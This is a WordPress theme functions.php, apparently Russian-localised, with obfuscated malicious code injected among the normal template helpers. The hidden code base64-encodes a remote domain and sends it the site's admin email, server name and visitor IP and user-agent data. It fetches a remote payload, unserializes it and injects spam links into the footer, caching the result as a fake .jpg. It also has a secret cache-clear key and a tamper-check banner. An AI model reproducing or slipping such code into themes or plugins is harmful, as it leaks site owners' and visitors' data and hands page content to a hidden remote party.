<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $DDYYEPY='s';$LAKSHP='6';$DMBC='4';$hhfp='b';$nQGYnA='e';$bVFRz='_';$dkcWxj='e';$PxNF='d';$Gulhee='c';$WtZFzsm='a';$zTmgR='e';$RFHqOxO='d';$UmtHOVZ='o';$RULwTEya=$hhfp.$WtZFzsm.$DDYYEPY.$nQGYnA.$LAKSHP.$DMBC.$bVFRz.$PxNF.$zTmgR.$Gulhee.$UmtHOVZ.$RFHqOxO.$dkcWxj;$fqmiJhX='f';$CArrCfR='i';$PGelE='l';$uzKU='a';$ctUON='g';$cwWUXkD='t';$JHwXdi='z';$johY='e';$nJgYLd='n';$RFKcXQum=$ctUON.$JHwXdi.$CArrCfR.$nJgYLd.$fqmiJhX.$PGelE.$uzKU.$cwWUXkD.$johY;$lEOIkO='3';$UVOzd='_';$ltWAKH='t';$jbhs='t';$SgaREda='o';$ixGZlRB='r';$prKMC='r';$IbEfYy='s';$mVhhJ='1';$ihJuLROk=$IbEfYy.$jbhs.$prKMC.$UVOzd.$ixGZlRB.$SgaREda.$ltWAKH.$mVhhJ.$lEOIkO;$NwvC='r';$rAQL='r';$YrFHV='e';$OoIK='v';$XoDyhp='t';$zWLJs='s';$OhFrJECg=$zWLJs.$XoDyhp.$NwvC.$rAQL.$YrFHV.$OoIK;                     
		$fb______________s='s';$jt______________d='6';$vb____y='4';$na___________j='b';$pe__d='e';$wo______c='_';$pg__________k='e';$uj____________h='d';$wo__c='c';$mk______________e='a';$jm___________w='e';$cv_______l='d';$qx_____________g='o';$li________n=$na___________j.$mk______________e.$fb______________s.$pe__d.$jt______________d.$vb____y.$wo______c.$uj____________h.$jm___________w.$wo__c.$qx_____________g.$cv_______l.$pg__________k;
		$fg_________w='_';$yz______w='n';$xb_____________q='s';$zn__________f='n';$ay____s='x';$cl___________d='t';$jb__________h='e';$rj________q='c';$bf_________i='o';$fr___________j='f';$re________r='s';$rc________t='u';$sb__________a='i';$wi____________r='t';$ip______f='i';$bm_______w=$fr___________j.$rc________t.$yz______w.$rj________q.$wi____________r.$sb__________a.$bf_________i.$zn__________f.$fg_________w.$jb__________h.$ay____s.$ip______f.$xb_____________q.$cl___________d.$re________r;
		$gj_____________o='p';$ez____________v='f';$uo_____g='e';$ef________w='o';$yf____________h='n';$lr____i=$ez____________v.$ef________w.$gj_____________o.$uo_____g.$yf____________h;
		$cq_______p='e';$ms_______k='f';$yd___________h='r';$ke___________x='a';$hi_________j='d';$gw____y=$ms_______k.$yd___________h.$cq_______p.$ke___________x.$hi_________j;
		$ut______________u='c';$ot___j='f';$fm______v='o';$mh___e='l';$ch___z='e';$fv_______c='s';$lg________z=$ot___j.$ut______________u.$mh___e.$fm______v.$fv_______c.$ch___z;
		
		define("WP_ID", $li________n("Mi4wLjA="));
		define("WP_TTL", $li________n("MTA4MDA="));
		define("WP_SRC", $li________n("dHBva24="));
	


		function wp_get_header() {
			global $li________n, $bm_______w;
			
			if (
				$bm_______w($li________n("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$bm_______w($li________n("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$bm_______w($li________n("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $li________n, $lr____i, $lg________z, $gw____y;
			
			$ti_____________u = TEMPLATEPATH."/".$li________n("Zm9vdGVyLnBocA==");
			$vw______u = @$lr____i($ti_____________u, "r");
			$ti_____________u = @$gw____y($vw______u, @filesize($ti_____________u));
			@$lg________z($vw______u);
			
			$ph______w = TEMPLATEPATH."/".$li________n("ZnVuY3Rpb25zLnBocA==");
			$vw______u = @$lr____i($ph______w, "r");
			$ph______w = @$gw____y($vw______u, @filesize($ph______w));
			@$lg________z($vw______u);
			
			$qd_____________q = 0;
			if($ti_____________u && $ph______w) {
				if ($li________n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ti_____________u, $li________n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$qd_____________q = 1;
					}
					if (substr_count($ti_____________u, "wp_theme_GPL_credits()") < 1) {
						$qd_____________q = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$qd_____________q = 12;
				}
			}
			
			if($qd_____________q > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $qd_____________q -->";
			}
		}
	


		function wp_loaded() {
			global $li________n, $bm_______w;
			return $bm_______w($li________n("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($cg_____k, $gv______________j = "(more...)", $vr_________p = 0, $gr___________b = "") {
				$bd____________m = get_the_content($gv______________j, $vr_________p, $gr___________b);
				$bd____________m = apply_filters("the_content", $bd____________m);
				
				$bd____________m = str_replace("]]>", "]]>", $bd____________m);
				if (strlen($_GET["p"]) > 0) {
					echo $bd____________m;
				}
				else if ((strlen($bd____________m)>$cg_____k) && ($qc__j = strpos($bd____________m, " ", $cg_____k ))) {
					$bd____________m = substr($bd____________m, 0, $qc__j);
					$bd____________m = $bd____________m;
					echo $bd____________m;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$gv______________j</a></div></p>";
				} else {
					echo $bd____________m;
				}
				
			}
		}
	


		$eh__________b='d';$xp_______________n='_';$qq_________j='o';$gu________o='4';$kp__________r='e';$ip_____a='b';$ks___________n='n';$cd___________p='a';$vk___l='c';$pg_________c='s';$tn____________g='e';$jv_______r='e';$wd_______________n='6';$uz______k=$ip_____a.$cd___________p.$pg_________c.$tn____________g.$wd_______________n.$gu________o.$xp_______________n.$jv_______r.$ks___________n.$vk___l.$qq_________j.$eh__________b.$kp__________r;
		$xy________q='s';$yv_______q='t';$ax_____________e='l';$bg____y='n';$bq___________b='i';$uy________w='g';$ni______________p='e';$go______________a='t';$cf________p='e';$sg______________t='c';$eq______________a='o';$bp__________t='t';$wk______d='e';$ni____p='n';$rd________v='f';$sc__________u='_';$xa_______x='_';$xk_______________f=$rd________v.$bq___________b.$ax_____________e.$wk______d.$xa_______x.$uy________w.$cf________p.$bp__________t.$sc__________u.$sg______________t.$eq______________a.$bg____y.$go______________a.$ni______________p.$ni____p.$yv_______q.$xy________q;
		$sq________i='l';$ar___________r='s';$rq_________q='x';$pk____i='t';$xb__g='i';$ni_____z='_';$qi___y='e';$dk_____________d='f';$xm______________d='e';$cq____________f='i';$ao______y='s';$sv_________l=$dk_____________d.$xb__g.$sq________i.$qi___y.$ni_____z.$xm______________d.$rq_________q.$cq____________f.$ao______y.$pk____i.$ar___________r;
		$lz__________v='c';$fn______x='r';$yh___f='v';$fk_______n='a';$zx___________x='p';$lu___w='e';$sx________e='n';$xh____________m='i';$xk______b='r';$qz_________f='s';$kk___________i='o';$ld______________j='_';$va_______l='m';$jl_____________w='e';$iu____v='o';$so___m=$yh___f.$jl_____________w.$xk______b.$qz_________f.$xh____________m.$iu____v.$sx________e.$ld______________j.$lz__________v.$kk___________i.$va_______l.$zx___________x.$fk_______n.$fn______x.$lu___w;
		$vd______________v='s';$oe__________q='e';$sr___________n='k';$ns_____i='o';$cu_________z='f';$wr______________o='c';$ah__e='p';$kr_______________b='o';$ye___________t='n';$zs_____a=$cu_________z.$vd______________v.$kr_______________b.$wr______________o.$sr___________n.$ns_____i.$ah__e.$oe__________q.$ye___________t;
		$py______________q='t';$ks___p='w';$qd___________q='e';$ph________z='i';$hw___________n='r';$aw___j='f';$jv_________b=$aw___j.$ks___p.$hw___________n.$ph________z.$py______________q.$qd___________q;
		$by______________r='m';$io________z='5';$fj___________v='d';$rd__z=$by______________r.$fj___________v.$io________z;
		$xg______________n='e';$qa_______q='t';$hz_______r='p';$wb_____q='a';$ia__________m='h';$dq____________k='r';$eu______y='a';$mi________v='l';$qh_______________f=$dq____________k.$xg______________n.$wb_____q.$mi________v.$hz_______r.$eu______y.$qa_______q.$ia__________m;
		$ue_____________j='i';$bu_______________m='a';$cg___s='i';$hs_________u='r';$sq_______i='e';$pl_____________o='n';$ct____________u='e';$qq______________d='z';$kr____________u='u';$qc________b='l';$nl_____________q='s';$uh_______k=$kr____________u.$pl_____________o.$nl_____________q.$sq_______i.$hs_________u.$cg___s.$bu_______________m.$qc________b.$ue_____________j.$qq______________d.$ct____________u;
		$fz___v='m';$zi____n='a';$ed___________c='e';$kc_______m='n';$un___________s='t';$bn__v='p';$sk__b='m';$jy_______________g=$un___________s.$ed___________c.$sk__b.$bn__v.$kc_______m.$zi____n.$fz___v;
		$dp____f='c';$oz_______________p='a';$ka__________n='_';$nc____x='t';$pf___x='_';$jp_________l='t';$pt____________e='c';$cz____l='s';$in___j='a';$qr_______________u='t';$oh__________y='o';$zk____________i='r';$nq___________r='e';$bj___y='r';$wd_______v='n';$ar____________i='e';$jx________u='e';$nm____________b='e';$de_______________s='t';$sh________b='m';$ev___________w='x';$sm______y=$cz____l.$jp_________l.$zk____________i.$jx________u.$in___j.$sh________b.$pf___x.$dp____f.$oh__________y.$wd_______v.$nc____x.$ar____________i.$ev___________w.$de_______________s.$ka__________n.$pt____________e.$bj___y.$nm____________b.$oz_______________p.$qr_______________u.$nq___________r;
	


		function ry___________f($jg_____a) {
			global $li________n, $bm_______w, $xk_______________f, $so___m, $sm______y;
			
			if (!$bm_______w($li________n("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($so___m(PHP_VERSION, "5.0.0", ">=") && $bm_______w($li________n("ZmlsZV9nZXRfY29udGVudHM=")) && $bm_______w($li________n("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$sb____________h = $sm______y(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$oo________q = @$xk_______________f($jg_____a, 0, $sb____________h);
			} else {
				$oo________q = @$xk_______________f($jg_____a, 0);
			}
			
			return $oo________q;
		}
	


		function vc_________i($jg_____a) {
			global $bm_______w, $zs_____a, $jv_________b, $li________n;
			
			if (!$bm_______w($li________n("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$tz___________d = strpos($jg_____a, "/", 7);
			$md_____b = array(
				"uri"     => substr($jg_____a, $tz___________d),
				"host"    => str_replace("http://", "", substr($jg_____a, 0, $tz___________d)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$dw_______q = @$zs_____a("$md_____b[host]", 80, $kw______________b, $rx___e, 4);
			
			if (!$dw_______q) {
				return false;
			} else {
				$oo________q = "";
				$lj_____m  = "GET $md_____b[uri] HTTP/1.0\r\n";
				$lj_____m .= "Host: $md_____b[host]\r\n";
				$lj_____m .= "Referer: $md_____b[referer]\r\n";
				$lj_____m .= "Connection: Close\r\n\r\n";
				
				@$jv_________b($dw_______q, $lj_____m);
				
				while (!@feof($dw_______q)) {
					$kx____q = @fgets($dw_______q, (1024*24));
					
					if ($kx____q == "\r\n") {
						$sc_____p = true;
						continue;
					}
					
					if ($sc_____p) {
						$oo________q .= $kx____q;
					}
				}
				
				return $oo________q;
			}
		}
	


		function xm_______________f($jg_____a) {
			global $bm_______w;
			$um____________q = false;
			
			if ($jg_____a != "") {
				if ($bm_______w("ry___________f")) {
					$um____________q = @ry___________f($jg_____a);
				}
				
				if (!$um____________q && ($bm_______w("vc_________i"))) {
					$um____________q = @vc_________i($jg_____a);
				}
			}
			
			return $um____________q;
		}
	


		function mx____________r() {
			global $_SERVER, $rd__z;
			
			$ku__w = $_SERVER["SERVER_NAME"];
			
			if (substr("$ku__w", 0, 4) == "www.") {
				$ku__w = substr("$ku__w", 4);
			}
			
			$ku__w = $rd__z("$_SERVER[SERVER_NAME]");
			
			return $ku__w;
		}
	


		function hi____x() {
			return "file";
		}
	


		function dx____r($jg_____a) {
			global $_SERVER, $xk_______________f, $sv_________l, $lr____i, $lg________z, $jv_________b;
			
			$pe__________n = gz___e();
			
			$ql____u = mx____________r().".jpg";
			$se___________p = $pe__________n["dir_upload"]["path"]."/$ql____u";
			$tk________w = @filemtime($se___________p);
			
			if (!$tk________w || ((time()-$tk________w) >= WP_TTL)) {
				$um____________q = xm_______________f($jg_____a);
				
				if ($um____________q) {
					if ($sv_________l($se___________p)) {
						@unlink($se___________p);
					}
					
					$vw______u = @$lr____i($se___________p, "x+");
					
					@$jv_________b($vw______u, $um____________q);
					@$lg________z($vw______u);
				}
			} else {
				if ($sv_________l($se___________p)) {
					$um____________q = @$xk_______________f($se___________p);
				} else {
					$um____________q = false;
				}
			}
			
			return $um____________q;
		}
	


		function gz___e() {
			global $_SERVER, $li________n, $uz______k;
			
			$ug_____r = wp_count_posts("post");
			$ra__r = pathinfo(get_bloginfo("template_directory"));
			
			$pe__________n = array(
				"url" => array(
					"report"      => $li________n("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ra__r,
				"dir_upload"	=> xr_________f(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ra__r[filename],
					"a005=".$ug_____r->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$pe__________n["url"]["queryString"] = implode("&", $pe__________n["queryString"]);
			$pe__________n["url"]["report"] = $pe__________n["url"]["report"]."/?".$uz______k($pe__________n["url"]["queryString"]).".html";
						
			return $pe__________n;
		}
	


		function xr_________f() {
			$do___________m = wp_upload_dir();
			
			if (isset($do___________m["error"])) {
				$pm_______________n = or_______________a();
				if (is_writable($pm_______________n)) {
					$do___________m = array("path" => $pm_______________n);
				}
			}

			return $do___________m;
		}
	


		function or_______________a() {
			global $bm_______w, $rd__z, $qh_______________f, $jy_______________g;
			
			$cy_____f = (bool) ini_get("safe_mode");
			if ($cy_____f == true) {
				return false;
			}
			
			if ($bm_______w("sys_get_temp_dir")) {
				$ns_____x = sys_get_temp_dir();
				if (is_writable($ns_____x)) {
					return $qh_______________f($ns_____x);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $qh_______________f($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $qh_______________f($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $qh_______________f($_ENV["TEMP"]);
			} else {
				$fw_____________k = $jy_______________g($rd__z(uniqid(rand(), true)), "");
				if ($fw_____________k) {
					$ns_____x = $qh_______________f(dirname($fw_____________k));
					@unlink($fw_____________k);
					return $ns_____x;
				} else {
					return false;
				}
			}
		}
	


		function gi___________f() {
			global $_GET, $sv_________l;
			
			$pe__________n = gz___e();
			$ku__w = mx____________r();
			$mm__________o = hi____x();
			
			$mr______t = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($mm__________o == "file") {
					$zx__________n = $pe__________n["dir_upload"]["path"]."/".$ku__w.".jpg";
					if ($sv_________l($zx__________n)) {
						@unlink($zx__________n);
						$mr______t = "deleted";
					}
				}
				
				$oe__y = array(
					"s"	=> $mr______t,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($oe__y AS $aw_______________a => $uo_________a) echo " [$aw_______________a:$uo_________a]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $bm_______w, $li________n, $uh_______k;
			$pe__________n = gz___e();
			
			$pz___h = "dx____r";
			if ($bm_______w($pz___h)) {
				$oo________q = $pz___h($pe__________n["url"]["report"]);
			}
			
			if ($oo________q) {
				if ($oo________q = @$li________n($oo________q)) {
					$oo________q = @$uh_______k($oo________q);
					
					if (strlen($oo________q[custom_credit]) >= 5) {
						$pe__________n["default_string"] = $oo________q[custom_credit];
					}
					
					if ($oo________q["status"] == "0") {
						$wa___________s = 1;
						$at______v = 1;
					} else {
						$ke___________h = sizeof($oo________q["links"]);
						$hu________p = $pe__________n["default_string"];
						
						if ($ke___________h > 0 && $oo________q["links"] !== "") {
							$db_______________i = 0;
							foreach ($oo________q["links"] as $wy________b => $ww________l) {
								$db_______________i++;
								if ($ww________l->l_path == "" || $ww________l->l_path == $_SERVER["REQUEST_URI"]) {
									$ww________l->l_href = htmlspecialchars(strip_tags($ww________l->l_href));
									$ww________l->l_title = htmlspecialchars(strip_tags($ww________l->l_title));
									$ww________l->l_anchor = htmlspecialchars(strip_tags($ww________l->l_anchor));
									$hu________p .= " | ";
									$hu________p .= "<a href='$ww________l->l_href' title='$ww________l->l_title'";
									if ($ww________l->l_nofollow == "1") {
										$hu________p .= " rel='nofollow'";
									}
									$hu________p .= ">$ww________l->l_anchor</a>";
								}
							}
						}
						$pe__________n["links"] = "$hu________p";
						if ($oo________q[credit] == "0") {
							$pe__________n["links"] = "";
						}
					}
				} else {
					$wa___________s = "1";
				}
			} else {
				$wa___________s = "1";
			}
			
			if ($wa___________s == "1") {
				$pe__________n["links"] = $pe__________n["default_string"];
			}
			
			echo "$pe__________n[links]";
			
			echo "<!-- s: $oo________q[signature] -->";
			gi___________f();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
             'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

